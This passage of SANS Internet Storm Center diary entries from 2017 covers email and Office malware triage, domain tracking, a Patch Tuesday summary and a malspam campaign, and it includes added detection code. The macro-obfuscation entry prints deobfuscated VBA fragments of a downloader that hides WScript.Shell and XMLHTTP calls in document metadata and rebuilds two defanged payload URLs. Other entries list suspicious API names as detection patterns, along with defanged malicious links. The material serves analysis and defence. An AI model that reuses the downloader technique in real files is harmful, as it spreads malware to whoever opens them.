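PROP_TYPES = {0x001E: "ASC", 0x001F: "UNI", 0x0102: "BIN"}
# A few property ids (first four hex digits) that matter when triaging mail
PROP_IDS = {
    0x0037: "Subject", 0x007D: "Transport headers", 0x1000: "Body",
    0x0C1F: "Sender email address", 0x0E04: "Display To",
    0x3701: "Attachment data", 0x3703: "Attachment extension",
    0x3707: "Attachment long filename",
}
STREAM_RE = re.compile(r"^(?:__attach_version1\.0_#(?P<attach>[0-9A-Fa-f]{8})/)?"
                       r"__substg1\.0_(?P<pid>[0-9A-Fa-f]{4})(?P<ptype>[0-9A-Fa-f]{4})$")

# Constructed stream list (not the reader's MSG): storage path written with "/".
SAMPLE_STREAMS = [
    ("__properties_version1.0", b"\x00" * 32),
    ("__substg1.0_0037001F", "Payment confirmation".encode("utf-16-le")),
    ("__substg1.0_007D001F", "Received: from mail.example.invalid\r\n".encode("utf-16-le")),
    ("__substg1.0_0C1F001E", b"billing@example.invalid"),
    ("__attach_version1.0_#00000000/__substg1.0_3707001F", "invoice.docx".encode("utf-16-le")),
    ("__attach_version1.0_#00000000/__substg1.0_37010102", b"PK\x03\x04" + b"\x00" * 12),
]


def classify_stream(name):
    """Decode a stream name into its attachment index, property id and type."""
    m = STREAM_RE.match(name)
    if not m:
        return None
    pid, ptype = int(m.group("pid"), 16), int(m.group("ptype"), 16)
    return {"attach": m.group("attach"), "pid": pid,
            "type": PROP_TYPES.get(ptype, "0x%04X" % ptype),
            "purpose": PROP_IDS.get(pid, "PR 0x%04X" % pid)}


def decode_value(ptype, data):
    """UNI streams are UTF-16LE (oledump's -t option), ASC are 8-bit text, BIN stay bytes."""
    if ptype == "UNI":
        return data.decode("utf-16-le").rstrip("\x00")
    if ptype == "ASC":
        return data.decode("latin-1").rstrip("\x00")
    return data


def triage(streams):
    """Return one record per property stream, decoded according to its type."""
    out = []
    for name, data in streams:
        info = classify_stream(name)
        if info:
            info["name"] = name
            info["value"] = decode_value(info["type"], data)
            out.append(info)
    return out


if __name__ == "__main__":
    for rec in triage(SAMPLE_STREAMS):
        print(rec["attach"], rec["type"], rec["purpose"], repr(rec["value"])[:60])
```

With a real MSG file the (name, data) pairs come from an OLE reader such as olefile; the classification itself needs nothing but the stream names, which is why it is cheap to run on every message before any content is opened.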

Let's take a look at some, like:

- the subject:

Since the data type is UNICODE, we use oledump's option -t to decode the content as UTF-16.

- the headers:

- the message body:

The attachment looks to be a .docx file:

We can analyze this attachment with zipdump:

This looks indeed like a Word document without macros.

With re-search, we can search through the XML files for URLs, email addresses, BTC addresses and IPv4 addresses.

We don't find any suspicious URLs:

Just a suspicious email address:
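The same four searches over the extracted XML, as an added example (my own Python, not re-search's code or its built-in patterns): one regular expression per indicator type, with hits that only point at OOXML schema hosts dropped, since every document.xml is full of those and they are what "no suspicious URLs" means in practice. The XML fragment is constructed in the code (not the reader's attachment) and the wallet address in it is a made-up string of the right shape, not a real address.

```python
import re

PATTERNS = {
    "url": re.compile(r"https?://[^\s\"'<>]+"),
    "email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "ipv4": re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"),
    # Base58 P2PKH/P2SH address shape; a shape match, not a checksum validation
    "btc": re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b"),
}
# OOXML files are full of schema URLs; these hosts are noise, not indicators.
NOISE_HOSTS = ("schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org", "purl.org")

# Constructed document.xml fragment (not the reader's sample); the address below is
# a made-up string with the right shape, not a real wallet.
SAMPLE_XML = """<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:body><w:p><w:r><w:t>Send payment to 1AbcDefGhJkLmNpQrStUvWxYz23456789a and confirm at
billing@example.invalid or call our support line hosted at 203.0.113.5.</w:t></w:r></w:p></w:body></w:document>"""


def search_iocs(text, noise_hosts=NOISE_HOSTS):
    """Run every pattern over the text and return {kind: sorted unique hits},
    dropping URLs/emails that only point at known schema hosts."""
    found = {}
    for kind, rx in PATTERNS.items():
        hits = {h for h in rx.findall(text) if not any(n in h for n in noise_hosts)}
        if hits:
            found[kind] = sorted(hits)
    return found


if __name__ == "__main__":
    for kind, values in search_iocs(SAMPLE_XML).items():
        print(kind, values)
```

The BTC pattern only checks the Base58 shape; a Base58Check checksum validation would cut false positives on long identifiers, but the shape alone is enough to pull candidates out of a scam document for a human to look at.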

Now it would be useful to read the content of the Word document, without actually having to open it in Word. That's what we'll do in the next part of this diary entry.

Stay tuned.

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

3 Comments

Published: 2017-12-16

Microsoft Office VBA Macro Obfuscation via Metadata

Often, malicious macros make use of the same functions to infect the victim's computer. If a macro contains these strings, it can be flagged as malicious or, at least, considered suspicious. Some examples of suspicious functions are:

  • Microsoft.XMLHTTP (used to fetch web data)
  • WScript.Shell (used to execute other scripts or commands)

Yesterday, I found a cool Microsoft Office document which uses its metadata to obfuscate the malicious macro. Also known as document properties, metadata are details about a file that describe or identify it. We can find details such as title, author name, subject, and keywords. The document was properly formatted with a nice welcome page and asked the user to enable macros:

But when you look at the metadata, you immediately see that something is suspicious. Let’s use Viper to extract the details:

+---------------------+---------------------------------------------------------------------------------------------------------------------+
| Name                | Value                                                                                                               |
+---------------------+---------------------------------------------------------------------------------------------------------------------+
| codepage_doc        | 1251                                                                                                                |
| category            | None                                                                                                                |
| presentation_target | None                                                                                                                |
| bytes               | 148480                                                                                                              |
| lines               | 2                                                                                                                   |
| paragraphs          | 1                                                                                                                   |
| slides              | None                                                                                                                |
| notes               | None                                                                                                                |
| hidden_slides       | None                                                                                                                |
| mm_clips            | None                                                                                                                |
| scale_crop          | False                                                                                                               |
| heading_pairs       | None                                                                                                                |
| titles_of_parts     | None                                                                                                                |
| manager             | None                                                                                                                |
| company             |                                                                                                                     |
| links_dirty         | False                                                                                                               |
| chars_with_spaces   | 282                                                                                                                 |
| unused              | None                                                                                                                |
| shared_doc          | False                                                                                                               |
| link_base           | None                                                                                                                |
| hlinks              | None                                                                                                                |
| hlinks_changed      | False                                                                                                               |
| version             | 1048576                                                                                                             |
| dig_sig             | None                                                                                                                |
| content_type        | None                                                                                                                |
| content_status      | Microsoft.XMLHTTPHCTAMAdodb.streaMHCTAMshell.ApplicationHCTAMWscript.shellHCTAMProcessHCTAMGeTHCTAMTeMPH <redacted> |
| language            | None                                                                                                                |
| doc_version         | None                                                                                                                |
+---------------------+---------------------------------------------------------------------------------------------------------------------+

The ‘content_status’ field contains a long string that is used in the macro. In the VBA code, there is a reference to BuiltInDocumentProperties(), used to extract metadata. Here is the corresponding function (the code has been beautified):

Public Function statRom1() As String
   ' Read the content of 'content_status'
   tt = ThisDocument.BuiltInDocumentProperties("Content status").Value
   ' Split the string on the 'HCTAM' separator
   SubMenu = Split(tt, "HCTAM")
   ' Here is the resulting array of suspicious strings:
   '  0: Microsoft.XMLHTTP
   '  1: Adodb.streaM
   '  2: shell.Application
   '  3: Wscript.shell
   '  4: Process
   '  5: GeT
   '  6: TeMP
   '  7: Type
   '  8: open
   '  9: write
   ' 10: responseBody
   ' 11: savetofile
   ' 12: \bososo.exe
   VertikName = SubMenu(3 * Quubo)
   ' Quubo == 0 -> VertikName == 'Microsoft.XMLHTTP', then Vertik is called
   Vertik
   SuD = ""
End Function

Here is the Vertik() function. Every SubMenu(x) can be replaced based on the array created above (SubMenu(2) => ‘shell.Application’, SubMenu(3) => ‘Wscript.shell’, etc.):

Public Sub Vertik()
  Set CofeeShop = CreateObject(VertikName)         ' CreateObject("Microsoft.XMLHTTP")
  smbi = RDM.Label1.Caption
  SubMenuE = SubMenu(2)                            ' shell.Application
  Set Puppit_avatar = CreateObject(SubMenu(3))     ' CreateObject("Wscript.shell")
  AnimTransferMap "Caption", False
  Set Puppit_VEAM = Puppit_avatar.Environment(SubMenu(4))  ' Environment("Process")
  Stocke = 24 / 4
  Puppit_FLAME = Puppit_VEAM(SubMenu(6))           ' the TEMP variable of the process environment
  MakeFarplane "G", "I", "MS"
End Sub

Later, the same technique is used to extract the URL where the payload to download is stored:

Shtefin = Replace("neosophyVUDIorg/nyRhdkwSDRUDNatakanVUDIcRIMBL/nyRhdkwSD", "RIMBL", "om")
' Returns: neosophyVUDIorg/nyRhdkwSDRUDNatakanVUDIcom/nyRhdkwSD
Shtefin = Replace(Shtefin, "VUDI", ".")
' Returns: neosophy.org/nyRhdkwSDRUDNatakan.com/nyRhdkwSD
AttMiner = Split(Join(Array(Shtefin, ""), ""), RDM.VLCPKD.Caption)

‘RDM.VLCPKD.Caption’ contains ‘RUDN’ and the array with two malicious URLs is created:

  • hXXp://neosophy[.]org/nyRhdkwSD
  • hXXp://atakan[.]com/nyRhdkwSD

‘RDM’ is the name of the document, set at the beginning of the macro:

Attribute VB_Name = "RDM"

And the document contains a form with an object called ‘VLCPKD’:

As you can see, the form also contains other pieces of function names ('Writ' + 'eToFile') and interesting strings ('http://').
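A check that catches this technique at the metadata layer, as an added example (my own Python, not Viper's code): it scans the text properties of a document, as returned by any metadata extractor, for known COM/WSH object names in any letter case and for values far longer than anyone types into a document property. The sample dictionary reuses the content_status value shown in the Viper output above (truncated as in the diary) next to constructed benign fields.

```python
SUSPICIOUS_APIS = ["Microsoft.XMLHTTP", "Adodb.Stream", "Shell.Application",
                   "WScript.Shell", "responseBody", "SaveToFile", "CreateObject"]
# OLE summary-information text fields, named as Viper reports them
TEXT_FIELDS = ["title", "subject", "author", "keywords", "comments", "category",
               "manager", "company", "content_status"]

# The content_status value from the Viper output above (truncated in the diary),
# next to constructed benign fields for contrast.
SAMPLE_PROPS = {
    "author": "John Doe",
    "company": "",
    "category": None,
    "content_status": "Microsoft.XMLHTTPHCTAMAdodb.streaMHCTAMshell.ApplicationHCTAM"
                      "Wscript.shellHCTAMProcessHCTAMGeTHCTAMTeMPH",
}


def scan_metadata(props, max_len=255):
    """Flag text properties that embed known COM/WSH object names (any case)
    or are far longer than a human would type into a document property.
    Returns one finding per suspicious field."""
    findings = []
    for field in TEXT_FIELDS:
        value = props.get(field)
        if not isinstance(value, str):
            continue
        apis = [api for api in SUSPICIOUS_APIS if api.lower() in value.lower()]
        if apis or len(value) > max_len:
            findings.append({"field": field, "length": len(value), "apis": apis})
    return findings


if __name__ == "__main__":
    for finding in scan_metadata(SAMPLE_PROPS):
        print(finding)
```

The case-insensitive match matters: the macro's author mixed case (streaM, GeT, TeMP) precisely because VBA's CreateObject does not care, while a naive string signature would. The separator (HCTAM here) can only be learned from the VBA, so splitting the value back into its array is left to the analyst.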

Finally, the document had classic behaviour: a PE file is downloaded and executed.

The Office document hash is cafe939110ed204dfcfd312e21aade2148dcf17ce1d5a6226e1c30c4edcaf4af[1]
The PE file hash is d27ea2a862848c82b7726584c6e66e41cb4988e3e92a42391d85d24fbe4e3d9c[2]

[1] https://www.virustotal.com/#/file/cafe939110ed204dfcfd312e21aade2148dcf17ce1d5a6226e1c30c4edcaf4af/detection
[2] https://www.virustotal.com/#/file/d27ea2a862848c82b7726584c6e66e41cb4988e3e92a42391d85d24fbe4e3d9c/details

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 Comments

Published: 2017-12-14

Detection Lab: Visibility & Introspection for Defenders

     Me when I discovered @Centurion's Detection Lab.

So Much Win

Chris Long, Detection & Incident Response Analyst at Palantir, released Detection Lab this past Monday. From his own Medium post, "Detection Lab is a collection of Packer and Vagrant scripts that allow you to quickly bring a Windows Active Directory online, complete with a collection of endpoint security tooling and logging best practices."
Detection Lab consists of four hosts:

  • DC: A Windows 2016 domain controller
  • WEF: A Windows 2016 server that manages Windows Event Collection
  • Win10: A Windows 10 host simulating a non-server endpoint
  • Logger: An Ubuntu 16.04 host that runs Splunk and a Fleet server

From the Detection Lab GitHub, "this lab has been designed with defenders in mind. Its primary purpose is to allow the user to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts."

The feature list should close the deal for you:

  • Splunk forwarders are pre-installed and all indexes are pre-created. Technology add-ons for Windows are also preconfigured.
  • A custom Windows auditing configuration is set via GPO to include command line process auditing and additional OS-level logging
  • Palantir's Windows Event Forwarding subscriptions and custom channels are implemented
  • Powershell transcript logging is enabled. All logs are saved to \\wef\pslogs
  • osquery comes installed on each host and is pre-configured to connect to a Fleet server via TLS. Fleet is preconfigured with the configuration from Palantir's osquery Configuration
  • Sysmon is installed and configured using SwiftOnSecurity’s open-sourced configuration
  • All autostart items are logged to Windows Event Logs via AutorunsToWinEventLog
  • SMBv1 Auditing is enabled

Chris really wanted defenders to "have a quick and easy way to bring up a lab environment, complete with tooling and pre-configured logging." Detection Lab represents many of his weekends worth of work, over many months, and for that, we salute him. Well done, Chris!

Russ McRee | @holisticinfosec

2 Comments

Published: 2017-12-14

Security Planner: Improve your online safety

Just in time for holiday visits with your families and friends, soon you will face the inevitable questions, particularly if you're a security practitioner of any sort. "There are always questions about whether the devices and services we use respect our privacy, and if they adequately safeguard our information. Has a good balance been struck? Many of us are not sure. It is easy to feel overwhelmed by the challenge of how to be safer online." Search for "how to be safe online" and you'll certainly receive inconsistent results. Who hasn't had Mom or Dad, or your friends for that matter, ask for your help to be more secure? To help rectify such situations, the Citizen Lab just released Security Planner.

All you need do is answer a few simple questions to receive personalized online safety recommendations. The app requires no personal information or access to any of your online accounts, it's confidential and can immediately help improve your online safety, with advice from experts. This is definitely something you can sit your parents down in front of knowing that, if they apply the recommendations provided after answering some very straightforward questions, they'll benefit from an improved online security posture.

"Security Planner recommendations are research-based best practices, kept up-to-date by a community of experts in digital security. Quality is maintained through a careful peer-review process: a committee of recognized experts regularly reviews and updates the survey questions and recommendations based on the latest research."

You can read the detailed philosophy behind Security Planner here.

For you, your friends, your family, the road to improved privacy, security, and safety online starts here: https://securityplanner.org

Russ McRee | @holisticinfosec

0 Comments

Published: 2017-12-13

Tracking Newly Registered Domains

Here is the next step in my series of diaries related to domain names. After tracking suspicious domains with a dashboard[1] and proactively searching for malicious domains[2], let’s focus on newly registered domains. There are a huge number of domain registrations performed every day (on average a few thousand per day, all TLDs combined). Why focus on new domains? With the multiple DGAs (“Domain Generation Algorithms”) used by malware families, it is useful to track newly created domains and correlate them with your local resolvers’ logs. You could detect some emerging threats or suspicious activities.

The challenge is to find a list of all those domains. There are plenty of online services that provide this kind of data. Some of them allow you to browse the new domains online[3]; others sell this kind of database, usually linked with the corresponding whois data, for a monthly fee (usually around $65)[4]. Some registrars offer a list for their own TLDs (like the AFNIC in France[5]) but they are limited.

I was looking for a global list that includes all TLDs and, if possible, for free. I found whoisds.com[6], which offers this service. They provide a complete database (domains + whois data) for a monthly fee, but the “simple” list (domains only) is available for free and without any registration.

I’m fetching the file via a simple shell script and a cron job:

#!/bin/bash
# Fetch the free daily list of newly registered domains from whoisds.com
# and turn it into a Splunk lookup file.
# The list for "today" is sometimes published late, so fetch the one
# dated two days ago.
TODAY=$(date --date="-2 day" +"%Y-%m-%d")
DESTDIR="/home/domains"
URL="https://whoisds.com/whois-database/newly-registered-domains/$TODAY.zip/nrd"
USERAGENT="XmeBot/1.0 (https://blog.rootshell.be/bot/)"
TEMPFILE=$(mktemp /tmp/wget_XXXXXX.zip)
LOGFILE=$(mktemp /tmp/wget_XXXXXX.log)
CSVFILE="/opt/splunk/etc/apps/search/lookups/newdomains.csv"

# Check if the destination directory exists
[ -d "$DESTDIR" ] || mkdir -p "$DESTDIR"
# Ensure that the file does not exist already
[ -r "$DESTDIR/$TODAY.txt" ] && rm "$DESTDIR/$TODAY.txt"

# -o: wget's own log file, -O: where to store the downloaded archive
wget -o "$LOGFILE" -O "$TEMPFILE" --user-agent="$USERAGENT" "$URL"
RC=$?
if [ "$RC" != "0" ]; then
        echo "[ERROR] Cannot fetch $URL"
        cat "$LOGFILE"
else
        unzip -d "$DESTDIR" "$TEMPFILE" >"$LOGFILE" 2>&1
        RC=$?
        if [ "$RC" != "0" ]; then
                echo "[ERROR] Cannot unzip $TEMPFILE"
                cat "$LOGFILE"
        else
                # Splunk lookup: a header line followed by one domain per line
                echo "newdomain" >"$CSVFILE"
                cat "$DESTDIR/$TODAY.txt" >>"$CSVFILE"
                rm "$LOGFILE" "$TEMPFILE"
        fi
fi

This script is executed once a day to store the daily file in the specified directory. A CSV file is also created in the specified Splunk application. Note that the script fetches the file that is 2 days old (--date="-2 day") because I noticed that sometimes the previous day's file is published with some delay!

With the CSV file created in Splunk, I can now search for newly created domains in my Bro DNS logs:

index=securityonion sourcetype=bro_dns (qtype_name="A" OR qtype_name="AAAA")
|rex field=query "(?<newdomain>[\w-]+\.[\w-]+)$"
|search [|inputlookup newdomains.csv]

You can also search for specific keywords like brands, keywords related to your business:

# cat domains_keyword.csv
keyword
*bank*
*paypal*
*apple*
*ec2*

Here is an interesting Splunk query:

|inputlookup newdomains.csv
|rex field=newdomain "(?<keyword>\w+)\.\w+"
|search [|inputlookup domains_keyword.csv]

This search returned for yesterday:

halk-bankbireysel.com
storybankmaine.org
summitbank.org 
towercommunitybankmortgage.org
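The same two correlations done outside Splunk, as an added example that is not part of the diary: it reduces each Bro query name to its last two labels the way the rex does, matches A/AAAA lookups against the daily list, and applies the keyword patterns to the first label. The log lines and the domain list are constructed samples.

```python
import fnmatch
import re

# Constructed sample of the daily whoisds.com list: one registered domain
# per line, no header (the four *bank* names are the diary's own results).
NEW_DOMAINS_TXT = """halk-bankbireysel.com
storybankmaine.org
summitbank.org
towercommunitybankmortgage.org
example-shop.net
"""

# The keyword lookup exactly as the diary defines it (header + patterns).
KEYWORDS_CSV = """keyword
*bank*
*paypal*
*apple*
*ec2*
"""

# Constructed sample of Bro dns.log records, tab separated and trimmed to
# the four fields used here: ts, id.orig_h, query, qtype_name.
DNS_LOG = (
    "1512950400.123\t10.0.0.12\twww.halk-bankbireysel.com\tA\n"
    "1512950401.456\t10.0.0.12\tmail.example.org\tMX\n"
    "1512950402.789\t10.0.0.30\tcdn.summitbank.org\tAAAA\n"
    "1512950403.000\t10.0.0.30\tsafe.example.com\tA\n"
    "1512950404.111\t10.0.0.44\tlogin.example-shop.net\tA\n"
)

# Last two labels of a name: the same approximation as the diary's rex.
# It does not know multi-label public suffixes (co.uk, com.au, ...); a
# production version would consult the Public Suffix List instead.
REGISTERED_RE = re.compile(r"(?:^|\.)([\w-]+\.[\w-]+)$")


def registered_domain(name):
    """Reduce a queried name to its registered (second-level) domain."""
    m = REGISTERED_RE.search(name.rstrip(".").lower())
    return m.group(1) if m else name.lower()


def load_new_domains(text):
    """Set of domains from the plain-text daily list."""
    return {line.strip().lower() for line in text.splitlines() if line.strip()}


def load_keywords(csv_text):
    """Glob patterns from the keyword lookup, skipping the header line."""
    lines = [l.strip() for l in csv_text.splitlines() if l.strip()]
    return lines[1:] if lines and lines[0].lower() == "keyword" else lines


def parse_dns_log(text):
    """Yield one dict per Bro dns.log record (tab separated, '#' lines skipped)."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        ts, src, query, qtype = line.split("\t")[:4]
        yield {"ts": ts, "src": src, "query": query, "qtype_name": qtype}


def match_new_domains(log_text, new_domains):
    """A/AAAA queries whose registered domain is on the NRD list."""
    hits = []
    for rec in parse_dns_log(log_text):
        if rec["qtype_name"] not in ("A", "AAAA"):
            continue
        reg = registered_domain(rec["query"])
        if reg in new_domains:
            hits.append(dict(rec, newdomain=reg))
    return hits


def match_keywords(new_domains, patterns):
    """NRD entries whose first label matches one of the glob patterns."""
    out = []
    for domain in sorted(new_domains):
        label = domain.split(".")[0]
        if any(fnmatch.fnmatchcase(label, p) for p in patterns):
            out.append(domain)
    return out


if __name__ == "__main__":
    nrd = load_new_domains(NEW_DOMAINS_TXT)
    for hit in match_new_domains(DNS_LOG, nrd):
        print("NRD hit: %(src)s asked %(qtype_name)s %(query)s -> %(newdomain)s" % hit)
    for domain in match_keywords(nrd, load_keywords(KEYWORDS_CSV)):
        print("keyword hit:", domain)
```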

Happy hunting! 

[1] https://isc.sans.edu/forums/diary/Suspicious+Domains+Tracking+Dashboard/23046/
[2] https://isc.sans.edu/forums/diary/Proactive+Malicious+Domain+Search/23065/
[3] https://domainpunch.com/tlds/daily.php
[4] https://www.whoisxmlapi.com/newly-registered-domains.php
[5] https://www.afnic.fr/en/products-and-services/services/daily-list-of-registered-domain-names/#
[6] https://whoisds.com/newly-registered-domains

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

4 Comments

Published: 2017-12-12

December Microsoft Patch Tuesday Summary

Microsoft today patched 36 different vulnerabilities (+ Flash). Luckily, none of the vulnerabilities have been exploited in the wild or disclosed prior to today. The list includes the malware protection engine update that was released on Friday. Probably the most interesting vulnerability is the remote code execution in Windows RRAS (%%cve:2017-11885%%). According to Microsoft, this vulnerability can be exploited via RPC on servers that have routing enabled (RRAS is the Routing and Remote Access Service). I am a bit confused why Microsoft rates this one only as "important". Maybe because RRAS is not enabled by default.

CVE / Description | Disclosed | Exploited | Exploitability (old versions / current version) | Severity
%%cve:2017-11885%% Windows RRAS Service Remote Code Execution Vulnerability | No | No | Less Likely / Less Likely | Important
%%cve:2017-11889%% Scripting Engine Memory Corruption Vulnerability | No | No | - / - | Critical
%%cve:2017-11890%% Scripting Engine Memory Corruption Vulnerability | No | No | More Likely / More Likely | Critical
%%cve:2017-11893%% Scripting Engine Memory Corruption Vulnerability | No | No | - / - | Critical
%%cve:2017-11895%% Scripting Engine Memory Corruption Vulnerability | No | No | More Likely / More Likely | Critical
%%cve:2017-11899%% Microsoft Windows Security Feature Bypass Vulnerability | No | No | Less Likely / Less Likely | Important
%%cve:2017-11901%% Scripting Engine Memory Corruption Vulnerability | No | No | More Likely / More Likely | Critical
%%cve:2017-11903%% Scripting Engine Memory Corruption Vulnerability | No | No | More Likely / More Likely | Critical
%%cve:2017-11906%% Scripting Engine Information Disclosure Vulnerability | No | No | More Likely / More Likely | Important
%%cve:2017-11908%% Scripting Engine Memory Corruption Vulnerability | No | No | - / - | Critical
%%cve:2017-11909%% Scripting Engine Memory Corruption Vulnerability | No | No | - / - | Critical
%%cve:2017-11910%% Scripting Engine Memory Corruption Vulnerability | No | No | - / - | Critical
%%cve:2017-11911%% Scripting Engine Memory Corruption Vulnerability | No | No | - / - | Critical
%%cve:2017-11912%% Scripting Engine Memory Corruption Vulnerability | No | No | More Likely / More Likely | Critical
%%cve:2017-11913%% Scripting Engine Memory Corruption Vulnerability | No | No | More Likely / More Likely | Important
%%cve:2017-11914%% Scripting Engine Memory Corruption Vulnerability | No | No | - / - | Critical
%%cve:2017-11918%% Scripting Engine Memory Corruption Vulnerability | No | No | - / - | Critical
%%cve:2017-11927%% Microsoft Windows Information Disclosure Vulnerability | No | No | Less Likely / Less Likely | Important
%%cve:2017-11930%% Scripting Engine Memory Corruption Vulnerability | No | No | More Likely / More Likely | Critical
%%cve:2017-11932%% Microsoft Exchange Spoofing Vulnerability | No | No | Less Likely / Less Likely | Important
%%cve:2017-11937%% Microsoft Malware Protection Engine Remote Code Execution Vulnerability | No | No | Less Likely / Less Likely | Critical
ADV170021 Microsoft Office Defense in Depth Update | No | No | More Likely / More Likely | None
ADV170023 Microsoft Exchange Defense in Depth Update | No | No | - / - | None
%%cve:2017-11886%% Scripting Engine Memory Corruption Vulnerability | No | No | More Likely / More Likely | Critical
%%cve:2017-11887%% Scripting Engine Information Disclosure Vulnerability | No | No | More Likely / More Likely | Important
%%cve:2017-11888%% Microsoft Edge Memory Corruption Vulnerability | No | No | - / - | Critical
%%cve:2017-11894%% Scripting Engine Memory Corruption Vulnerability | No | No | More Likely / More Likely | Critical
%%cve:2017-11907%% Scripting Engine Memory Corruption Vulnerability | No | No | More Likely / More Likely | Critical
%%cve:2017-11905%% Scripting Engine Memory Corruption Vulnerability | No | No | - / - | Critical
%%cve:2017-11916%% Scripting Engine Memory Corruption Vulnerability | No | No | - / - | Important
%%cve:2017-11919%% Scripting Engine Information Disclosure Vulnerability | No | No | More Likely / More Likely | Important
%%cve:2017-11934%% Microsoft PowerPoint Information Disclosure Vulnerability | No | No | Less Likely / Less Likely | Important
%%cve:2017-11935%% Microsoft Excel Remote Code Execution Vulnerability | No | No | - / - | Important
%%cve:2017-11936%% Microsoft SharePoint Elevation of Privilege Vulnerability | No | No | - / - | Important
ADV170022 December 2017 Flash Security Update | No | No | - / - | Critical
%%cve:2017-11939%% Microsoft Office Information Disclosure Vulnerability | No | No | - / - | Important
%%cve:2017-11940%% Microsoft Malware Protection Engine Remote Code Execution Vulnerability | No | No | Less Likely / Less Likely | Critical

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
STI|Twitter|


0 Comments

Published: 2017-12-11

Pornographic malspam pushes coin miner malware

Introduction

On Saturday 2017-12-09 and Sunday 2017-12-10, I came across a wave of malicious spam (malspam) with links to a Bitcoin miner disguised as pornographic material.  The emails all had the same links.  One of them was off-line by the time I checked, but the other downloaded a zip archive named SeeMyXXXphoto.zip.  Windows Defender quickly caught and deleted the malware, so people aren't really at risk for this.  However, I wanted to document this campaign with a quick diary.

Details

The emails had various subject lines, spoofed senders, and different first paragraphs in the message text.  I submitted an example in the .eml format to VirusTotal (link). The emails each contained a different pornographic image followed by the message text.  The second paragraph in each message text read the same, stating:

Maybe you want see my private XXX photo??? Ooooohhhh.... ok! Just download archive from this link and open and install it. And you can get access to some my hot photos )))

It was followed by a link to: hxxp://martialartsbenefits[.]com/SeeMyXXXphoto.zip


Shown above:  Screenshot from one of the emails (minus the pornographic image).


Shown above:  Downloaded zip archive and the extracted file.

Windows Defender identified the malware as Trojan:Win32/Tiggre!rfn, but that didn't describe the malware for me.  A quick check on VirusTotal indicates the malware is a Bitcoin miner.  Running the malware on a Windows host in my lab environment confirmed Bitcoin miner-style traffic, and it appears to be based on CPUminer Multi version 1.1.


Shown above:  Windows Defender quickly caught the file when I tried downloading it on 2017-12-10.


Shown above:  VirusTotal indicates the downloaded file is a coin miner.


Shown above:  Traffic from an infection filtered in Wireshark indicates this is CPUminer Multi version 1.1.

Indicators

Emails noted:

  • Date/Time:  Sunday, 2017-12-10 00:08 UTC
  • From:  "Isabelle" <uahaddeq@2winglobal.com>
  • Subject:  That's why I love our parties! Just look here
  • Date/Time:  Sunday, 2017-12-10 16:28 UTC
  • From:  "Martine" <vhgred@adsupplyco.com>
  • Subject:  I would go through the streets slack-jawed
  • Date/Time:  Sunday, 2017-12-10 18:04 UTC
  • From:  "Birgit" <clhzyuade@edhec.com>
  • Subject:  Oh Gooood, it is the hottest of all that I've ever seen Just look here!
  • Date/Time:  Sunday, 2017-12-10 19:14 UTC
  • From:  "Manon" <dhxnik@advanceserviceplus.com>
  • Subject:  Is your character as hard as your muscles?
  • Date/Time:  Sunday, 2017-12-10 23:10 UTC
  • From:  "Lola" <fotubhw@1800radiator.com>
  • Subject:  Even your eyes can tell me how confident you are.

Links in the emails:

  • hxxp://khudermunkh[.]mn/cgi/
  • hxxp://martialartsbenefits[.]com/SeeMyXXXphoto.zip

Malware:

SHA256 hash:  922784709d4054db9df7149b3b0d17ba310b4c3b3ba5ca4d41f1f460d318dd83

  • File size:  2,201,826 bytes
  • File name:  SeeMyXXXphoto.zip
  • Description:  Downloaded zip archive

SHA256 hash:  28f18837d7a60d8a5d90b96c48a104996fcfb4a710b8abcfe1449607d101dd67

  • File size:  2,339,166 bytes
  • File name:  Open and see my XXX photo and Video.exe
  • Description:  Extracted Windows executable - Bitcoin mining malware

Traffic from an infected Windows host:

  • 144.217.101.20 port 8005 - xmr-usa.dwarfpool.com - CPUminer traffic

Final words

Windows 10 hosts seem well-protected against this threat.  As always, on older versions of Windows, system administrators and the technically inclined can implement best practices like Software Restriction Policies (SRP) or AppLocker to prevent these types of infections.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

3 Comments

Published: 2017-12-09

Sometimes it's a dud

A reader submitted a malicious RTF file, having had difficulty finding the malicious code in it.

It was delivered via email, so we analyze the email with emldump.py:

I've seen such emails before:

They typically have a malicious document as attachment.

Here it's an RTF file:

We can analyze it with rtfdump.py:

The RTF file has no objects:

It's always possible that objects are so obfuscated that rtfdump.py is not able to identify them. So let's take a look at the amount of hexadecimal characters we can find in the RTF file:

There are hardly any hexadecimal characters: the longest contiguous string of hexadecimal characters is just 20 characters long.

So this RTF file does not seem to contain malicious code. Looking at the file itself with a text editor, I came to the conclusion that it's just an empty RTF file (with metadata). With the metadata, I was able to find actual malicious RTF files produced by the same actor. So this must be a failed attempt at delivering malicious documents.


Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

0 Comments

Published: 2017-12-08

Using Our API To Adjust iptables Rules

We are offering a simple (IMHO) API to allow you to script various queries against our databases. One dataset we offer is a list of IP addresses that are scanning the internet for exposed services. The most prominent of these services is likely Shodan. To avoid having any devices from your organization show up in Shodan, you may want to block all scans from known Shodan hosts. We do create a list of these IP addresses and update it daily. The respective API query to retrieve the list is:

https://isc.sans.edu/api/threatlist/shodan/

By default, the list is returned as XML, but it is pretty easy to change the format: all you need to do is add ?json, ?text ... to the URL. This makes processing with simple scripts rather easy. The "text" format is probably easiest to process with shell tools, but just in case the format changes later in some subtle way, it is probably safest to use JSON and have the "jq" utility parse it:

curl -s https://isc.sans.edu/api/threatlist/shodan?json | jq -r '.[].ipv4'

This will return a list of all the IP addresses. To use this in iptables, I would recommend setting up a new chain. Something like:

# The user-defined chains "shodan" and "LOGDROP" must already exist
# (iptables -N shodan; iptables -N LOGDROP) and INPUT must jump to "shodan".
